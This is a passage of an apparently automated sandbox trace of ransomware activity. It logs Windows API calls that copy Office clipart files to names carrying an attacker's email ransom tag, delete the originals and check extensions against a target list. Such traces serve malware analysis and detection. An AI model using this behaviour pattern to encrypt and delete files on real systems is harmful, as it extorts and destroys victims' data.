office\\root\\clipart\\pub60cor\\fd00965_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.385] GetLastError () returned 0x0 [0066.385] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3b3c, lpOverlapped=0x0) returned 1 [0066.443] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3b40, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3b40, lpOverlapped=0x0) returned 1 [0066.444] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.444] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.444] SetEndOfFile (hFile=0x368) returned 1 [0066.444] CloseHandle (hObject=0x368) returned 1 [0066.444] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.444] SetEndOfFile (hFile=0x354) returned 1 [0066.445] CloseHandle (hObject=0x354) returned 1 [0066.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf")) returned 1 [0066.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 68 [0066.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 68 [0066.446] lstrlenW (lpString=".doc") returned 4 [0066.446] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.446] lstrlenW (lpString=".docx") returned 5 [0066.446] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.446] lstrlenW (lpString=".pdf") returned 4 [0066.446] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.446] lstrlenW (lpString=".xls") returned 4 [0066.446] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.446] lstrlenW (lpString=".xlsx") returned 5 [0066.446] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.446] lstrlenW (lpString=".ppt") returned 4 [0066.446] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 68 [0066.446] lstrlenW (lpString=".zip") returned 4 [0066.446] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.446] lstrlenW (lpString=".rar") returned 4 [0066.446] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.446] lstrlenW (lpString=".bz2") returned 4 [0066.446] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.446] lstrlenW (lpString=".7z") returned 3 [0066.446] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.446] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 68 [0066.446] lstrlenW (lpString=".dbf") returned 4 [0066.447] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 68 [0066.447] lstrlenW (lpString=".1cd") returned 4 [0066.447] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.447] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF") returned 68 [0066.447] lstrlenW (lpString=".jpg") returned 4 [0066.447] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.447] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.447] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0066.448] GetLastError () returned 0x0 [0066.448] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xf7c, lpOverlapped=0x0) returned 1 [0066.461] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf80, lpOverlapped=0x0) returned 1 [0066.462] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.462] WriteFile (in: hFile=0x368, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.462] SetEndOfFile (hFile=0x368) returned 1 [0066.477] CloseHandle (hObject=0x368) returned 1 [0066.482] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.482] SetEndOfFile (hFile=0x354) returned 1 [0066.483] CloseHandle (hObject=0x354) returned 1 [0066.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01191_.wmf")) returned 1 [0066.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 68 [0066.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 68 [0066.484] lstrlenW (lpString=".doc") returned 4 [0066.484] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString=".docx") returned 5 [0066.484] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.484] lstrlenW (lpString=".pdf") returned 4 [0066.484] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString=".xls") returned 4 [0066.484] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.484] lstrlenW (lpString=".xlsx") returned 5 [0066.484] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.484] lstrlenW (lpString=".ppt") returned 4 [0066.484] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 68 [0066.484] lstrlenW (lpString=".zip") returned 4 [0066.484] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.484] lstrlenW (lpString=".rar") returned 4 [0066.484] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString=".bz2") returned 4 [0066.484] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString=".7z") returned 3 [0066.484] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 68 [0066.484] lstrlenW (lpString=".dbf") returned 4 [0066.484] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 68 [0066.484] lstrlenW (lpString=".1cd") returned 4 [0066.484] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01191_.WMF") returned 68 [0066.485] lstrlenW (lpString=".jpg") returned 4 [0066.485] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.485] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.485] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.485] GetLastError () returned 0x0 [0066.485] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x76ce, lpOverlapped=0x0) returned 1 [0066.498] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x76d0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x76d0, lpOverlapped=0x0) returned 1 [0066.500] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.500] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.500] SetEndOfFile (hFile=0x340) returned 1 [0066.500] CloseHandle (hObject=0x340) returned 1 [0066.500] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.500] SetEndOfFile (hFile=0x354) returned 1 [0066.501] CloseHandle (hObject=0x354) returned 1 [0066.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.501] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd01657_.wmf")) returned 1 [0066.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 68 [0066.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 68 [0066.508] lstrlenW (lpString=".doc") returned 4 [0066.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.520] lstrlenW (lpString=".docx") returned 5 [0066.521] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.521] lstrlenW (lpString=".pdf") returned 4 [0066.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.521] lstrlenW (lpString=".xls") returned 4 [0066.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.521] lstrlenW (lpString=".xlsx") returned 5 [0066.521] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.521] lstrlenW (lpString=".ppt") returned 4 [0066.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 68 [0066.521] lstrlenW (lpString=".zip") returned 4 [0066.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.521] lstrlenW (lpString=".rar") returned 4 [0066.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.521] lstrlenW (lpString=".bz2") returned 4 [0066.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.521] lstrlenW (lpString=".7z") returned 3 [0066.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 68 [0066.521] lstrlenW (lpString=".dbf") returned 4 [0066.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 68 [0066.521] lstrlenW (lpString=".1cd") returned 4 [0066.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01657_.WMF") returned 68 [0066.521] lstrlenW (lpString=".jpg") returned 4 [0066.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.522] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.522] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.522] GetLastError () returned 0x0 [0066.522] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x112c, lpOverlapped=0x0) returned 1 [0066.532] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1130, lpOverlapped=0x0) returned 1 [0066.533] ReadFile (in: hFile=0x354, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.533] WriteFile (in: hFile=0x340, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.533] SetEndOfFile (hFile=0x340) returned 1 [0066.533] CloseHandle (hObject=0x340) returned 1 [0066.533] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.533] SetEndOfFile (hFile=0x354) returned 1 [0066.534] CloseHandle (hObject=0x354) returned 1 [0066.534] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.534] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02075_.wmf")) returned 1 [0066.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 68 [0066.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 68 [0066.535] lstrlenW (lpString=".doc") returned 4 [0066.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.535] lstrlenW (lpString=".docx") returned 5 [0066.535] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.535] lstrlenW (lpString=".pdf") returned 4 [0066.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.535] lstrlenW (lpString=".xls") returned 4 [0066.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.535] lstrlenW (lpString=".xlsx") returned 5 [0066.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.535] lstrlenW (lpString=".ppt") returned 4 [0066.535] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 68 [0066.535] lstrlenW (lpString=".zip") returned 4 [0066.535] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.535] lstrlenW (lpString=".rar") returned 4 [0066.535] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.535] lstrlenW (lpString=".bz2") returned 4 [0066.535] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.535] lstrlenW (lpString=".7z") returned 3 [0066.535] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 68 [0066.535] lstrlenW (lpString=".dbf") returned 4 [0066.535] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 68 [0066.536] lstrlenW (lpString=".1cd") returned 4 [0066.536] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02075_.WMF") returned 68 [0066.536] lstrlenW (lpString=".jpg") returned 4 [0066.536] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.540] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.540] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.541] GetLastError () returned 0x0 [0066.541] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x61c, lpOverlapped=0x0) returned 1 [0066.614] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x620, lpOverlapped=0x0) returned 1 [0066.671] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.671] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.672] SetEndOfFile (hFile=0x2c0) returned 1 [0066.672] CloseHandle (hObject=0x2c0) returned 1 [0066.672] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.672] SetEndOfFile (hFile=0x2c8) returned 1 [0066.673] CloseHandle (hObject=0x2c8) returned 1 [0066.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.673] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02097_.wmf")) returned 1 [0066.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 68 [0066.673] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 68 [0066.673] lstrlenW (lpString=".doc") returned 4 [0066.673] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.673] lstrlenW (lpString=".docx") returned 5 [0066.673] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.674] lstrlenW (lpString=".pdf") returned 4 [0066.674] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.674] lstrlenW (lpString=".xls") returned 4 [0066.674] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.674] lstrlenW (lpString=".xlsx") returned 5 [0066.674] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.674] lstrlenW (lpString=".ppt") returned 4 [0066.674] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 68 [0066.674] lstrlenW (lpString=".zip") returned 4 [0066.674] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.674] lstrlenW (lpString=".rar") returned 4 [0066.674] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.674] lstrlenW (lpString=".bz2") returned 4 [0066.674] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.674] lstrlenW (lpString=".7z") returned 3 [0066.674] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 68 [0066.674] lstrlenW (lpString=".dbf") returned 4 [0066.674] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 68 [0066.674] lstrlenW (lpString=".1cd") returned 4 [0066.674] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.674] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02097_.WMF") returned 68 [0066.674] lstrlenW (lpString=".jpg") returned 4 [0066.674] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.674] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.675] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.675] GetLastError () returned 0x0 [0066.675] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xf94, lpOverlapped=0x0) returned 1 [0066.760] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xfa0, lpOverlapped=0x0) returned 1 [0066.761] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.761] WriteFile (in: hFile=0x2c0, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.761] SetEndOfFile (hFile=0x2c0) returned 1 [0066.762] CloseHandle (hObject=0x2c0) returned 1 [0066.762] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.762] SetEndOfFile (hFile=0x2c8) returned 1 [0066.762] CloseHandle (hObject=0x2c8) returned 1 [0066.762] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.763] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02116_.wmf")) returned 1 [0066.763] lstrlenW 